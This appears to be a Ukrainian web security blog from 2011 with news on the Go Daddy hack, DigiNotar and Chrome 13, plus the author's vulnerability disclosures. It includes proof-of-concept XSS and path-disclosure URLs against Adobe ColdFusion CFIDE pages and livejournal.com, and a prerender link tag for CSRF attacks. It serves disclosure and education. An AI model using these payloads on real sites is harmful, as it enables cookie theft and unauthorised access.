Websecurity - Веб безпека

За повідомленням www.xakep.ru, користувачі Go Daddy постраждали від масового взлому.

Масова атака на 445 сайтів полягала у впровадженні шкідливого редиректа у файли .htaccess. Go Daddy швидко усунули шкідливий код, щоб убезпечити своїх клієнтів і відновити повний контроль над зараженими сайтами.

Не тільки на серверах українських хостерів відбуваються масові взломи (про що я пишу регулярно), але й на серверах західних хостерів, зокрема такого великого хостінг і домен провайдера як Go Daddy.

Подібні атаки зі зміною .htaccess файлів давно відомі. Такий вид шахрайства часто є невід’ємною частиною маніпуляційних атак на пошукові системи, розроблених з метою переадресації користувачів, що знаходяться в пошуку визначеного контента.

За повідомленням hackzona.com.ua, Microsoft заснувала конкурс з розробки нових технологій комп’ютерного захисту.

Корпорація Microsoft заснувала конкурс BlueHat Prize для експертів в області комп’ютерної безпеки. Про це було оголошено на конференції Black Hat.

Майкрософт обіцяє призи за розробку інноваційних засобів протидії атакам, в ході яких задіюються уразливості, пов’язані з організацією пам’яті.

За повідомленням www.xakep.ru, DigiNotar оголосила про банкрутство.

Компанія DigiNotar, що випускала SSL-сертифікати безпеки для багатьох відомих сайтів, визнана банкрутом після масштабної хакерської атаки, у результаті якої “під удар” потрапили, як мінімум, 300 тисяч комп’ютерів в Ірані, повідомила нещодавно прес-служба материнської компанії DigiNotar VASCO.

DigiNotar допустила видачу великої кількості підроблених сертифікатів. Про що компанія більше місяця не повідомляла, аж до кінця серпня, коли був публічно опублікований один з цих сертифікатів. Але після того як інформація про інцедент стала відомою, були проведені розслідування і виявлені більше 500 підроблених SSL-сертифікатів сервісів Google, Facebook, Twitter, Skype та інших компаній. Що і призвело до відповідних наслідків для DigiNotar. У випадку Comodo наслідки були не такими жорсткими (бо і підроблених сертифікатів було значно менше).

В березні в записі Вбудований CSRF в Mozilla та Firefox я писав про проведення CSRF атак через префетчінг - функцію попереднього завантаження сторінок. Що наявна в браузерах від Mozilla (всіх браузерах на движку Gecko).

І в Google Chrome 13, як в dev і beta, так і фінальній версії, що вийшла минулого місяця, додали підтримку префетчінгу. Цю функцію Гугл ще називає пререндіренгом та Instant Pages. Тому з недавніх пір не тільки браузери Mozilla та Firefox, але й Chrome вразливі до CSRF атак через префетчінг.

По замовчуванню в Chrome опція префетчінга увімкнена. Що дозволяє проводити дану атаку на всіх користувачів Google Chrome 13 та наступних версій.

На даний момент підтримується один з трьох (реалізованих Мозілою) варіантів префетчінгу (і відповідно варіантів атаки):

<link rel=”prerender” href=”http://site/script_to_attack”>

Тільки замість “prefetch”, використовується “prerender”. Варіанти префетчінгу (і атаки) через meta-тег і HTTP заголовок Link будуть додані пізніше.

Враховуючи, що Гугл розширив концепцію префетчінга в своїй функції пререндерінга, то і атака може бути більш небезпечною. Якщо у префетчінгу відбувався лише один запит до одної сторінки (і лише вона викачувалася), то у пререндеренгу викачується як сама сторінка, так і всі ресурси, на які вона посилається (тобто відбувається багато запитів з одного лише link-тега). Що може використовуватися як з метою DoS-атак одночасно на велике число ресурсів (зі сторінки, на яку вказує link-тег), так і для проведення багатьох CSRF-атак (на один або багато різних сайтів).

Для захисту від даної атаки потрібно відключити префетчінг в браузері. Для цього в налаштуваннях (Settings) потрібно відключити опцію “Predict network actions to improve page load performance”. В цьому відношенні Гугл зробив краще ніж Мозіла, бо залишив дану опцію в налаштуваннях (тому що Мозіла робила так в старих браузерах, а починаючи з Firefox приховала дану опцію і потрібно її змінювати спеціальних просунутим методом, що я описав в вищезгаданому записі).

Атака працює в Google Chrome 13.0. А також (при використанні rel=”prefetch”), як я писав раніше, в Mozilla та Firefox (та інших браузерах на движку Gecko, що має функцію префетчінга).

В статті Безопасность расширений Google Chrome - привычные векторы атак в контексте аддонов для браузера розповідається про безпеку розширень до браузерів, зокрема до Google Chrome. Про вектори атак через доповнення до браузера.

В даній статті розглянуті наступні аспекти безпеки розширень Google Chrome:

• XSS.
• Кукіси.
• Дані веб браузера як ціль для атаки.
• Фішинг.
• Ризики, пов’язані з використання JSON.
• Впроваджуємі скрипти.

Використання стандартних веб технологій (таких як HTML, CSS і JavaScript) для розробки доповнень, призводить до появи уразливостей в аддонах до браузерів, аналогічних тим, які ми зустрічаємо у веб додатах. Тому розробникам доповнень до браузерів (так само як і плагінів, таких як Flash та інші) слід краще слідкувати за безпекою власних програм.

25.06.2011

У червні, 18.06.2011, я знайшов Cross-Site Scripting та Full path disclosure уразливості в Adobe ColdFusion. Які я виявив на багатьох сайтах, що використовують ColdFusion. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в Adobe ColdFusion.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

23.09.2011

XSS:

http://site/CFIDE/componentutils/componentdetail.cfm?component=%3Cbody%20onload=alert(document.cookie)%3E
http://site/CFIDE/componentutils/cfcexplorer.cfc?method=getcfcinhtml&name=%3Cbody%20onload=alert(document.cookie)%3E
http://site/CFIDE/componentutils/cfcexplorer.cfc?method=%3Cbody%20onload=alert(document.cookie)%3E

http://site/CFIDE/componentutils/cfcexplorer.cfc (XSS через заголовок User-Agent)

http://site/CFIDE/probe.cfm (XSS через заголовок User-Agent)

http://site/CFIDE/Application.cfm (XSS через заголовок User-Agent)

http://site/CFIDE/componentutils/Application.cfm (XSS через заголовок User-Agent)

http://site/CFIDE/componentutils/_component_cfcToHTML.cfm (XSS через заголовок User-Agent)

http://site/CFIDE/componentutils/_component_cfcToMCDL.cfm (XSS через заголовок User-Agent)

Full path disclosure:

http://site/CFIDE/probe.cfm
http://site/CFIDE/componentutils/componentdetail.cfm?component=CFIDE.adminapi.base
http://site/CFIDE/componentutils/cfcexplorer.cfc?method=getcfcinhtml&name=WEB-INF.cftags.component
http://site/CFIDE/componentutils/cfcexplorer.cfc?method=1
http://site/CFIDE/componentutils/_component_cfcToHTML.cfm
http://site/CFIDE/componentutils/_component_cfcToMCDL.cfm

Через componentdetail.cfm та cfcexplorer.cfc можна отримати FPD навіть при відключених дебаг повідомленнях на сервері.

Уразливі Adobe ColdFusion 7 та попередні версії до XSS, і Adobe ColdFusion 9 та попередні версії до FPD.

В даній добірці уразливості в веб додатках:

• CA Total Defense Suite UNC Management Console DeleteFilter SQL Injection Vulnerability (деталі)
• Apache Archiva cross-site scripting vulnerability (деталі)
• CA Total Defense Suite NonAssignedUserList Stored Procedure SQL Injection Vulnerability (деталі)
• Path disclosure in FlatnuX (деталі)
• CA Total Defense Suite UNC Management Console DeleteReportLayout SQL Injection Vulnerability (деталі)
• DoS (Denial of Service) Risk in FlatnuX (деталі)
• HP Virtual Server Environment for Windows, Remote Privilege Elevation (деталі)
• Path disclosure in Coppermine (деталі)
• Directory Traversal Vulnerability in Viola DVR VIO-4/1000 (деталі)
• “time” SQL Injection vulnerability in WSN Guest (деталі)

В презентації Mc Graw Hill Hacking Exposed Web 2.0, наводиться повний текст книги “Hacking Exposed Web 2.0″. В якій розповідається про вразливий до хакінгу Web 2.0. Про те, які ризики безпеки існують в Веб 2.0 додатках та як від них захиститися.

В серпні, 02.08.2011, через два місяці після виходу Google Chrome 12, вийшов Google Chrome 13.

В браузері зроблено ряд нововведень. А також виправлено 30 помилок у безпеці, з яких 14 уразливостей позначені як небезпечні, 9 - помірні і 7 - незначні. В тому числі виправлена URL Spoofing уразливість, про яку я писав раніше.

• Релиз web-браузера Chrome 13 с исправлением 30 уязвимостей (деталі)

08.12.2010

У серпні, 13.08.2010, я знайшов Cross-Site Scripting уразливість на популярному проекті http://www.livejournal.com. Про що найближчим часом сповіщу адміністрацію проекту.

Раніше я вже писав про уразливості на livejournal.com.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

22.09.2011

XSS:

http://www.livejournal.com/update.bml?event=%3Cimg%20src='1'%20onerror=alert(document.cookie)%3E

XSS працювала в браузерах IE та Chrome.

Дана уразливість вже виправлена.

В даній добірці уразливості в веб додатках:

• HP Insight Control Performance Management for Windows, Remote Privilege Elevation, Cross Site Request Forgery (CSRF) (деталі)
• Multiple XSS vulnerabilities in Gollos (деталі)
• CA Total Defense Suite Heartbeat Web Service Remote Code Execution Vulnerability (деталі)
• Multiple XSS vulnerabilities in Wikipad (деталі)
• CA Total Defense Suite UnassignFunctionalUsers Stored Procedure SQL Injection Vulnerability (деталі)
• SQL Injection in Seo Panel (деталі)
• CA Total Defense Suite UNCWS Web Service getDBConfigSettings Credential Disclosure Vulnerability (деталі)
• SQL Injection in Seo Panel (деталі)
• CA Total Defense Suite UnassignAdminRoles Stored Procedure SQL Injection Vulnerability (деталі)
• SQL Injection in Seo Panel (деталі)

Продовжуючи традицію, пропоную вашій увазі цікаві секюріті статті. Щоб ви поповнювали свої знання з веб безпеки.

Добірка цікавого чтива на тему безпеки, в тому числі web security (статті з Вікіпедії):

• Privacy-invasive software
• Keystroke logging
• Cross-application scripting
• Evasion (network security)
• Uncontrolled format string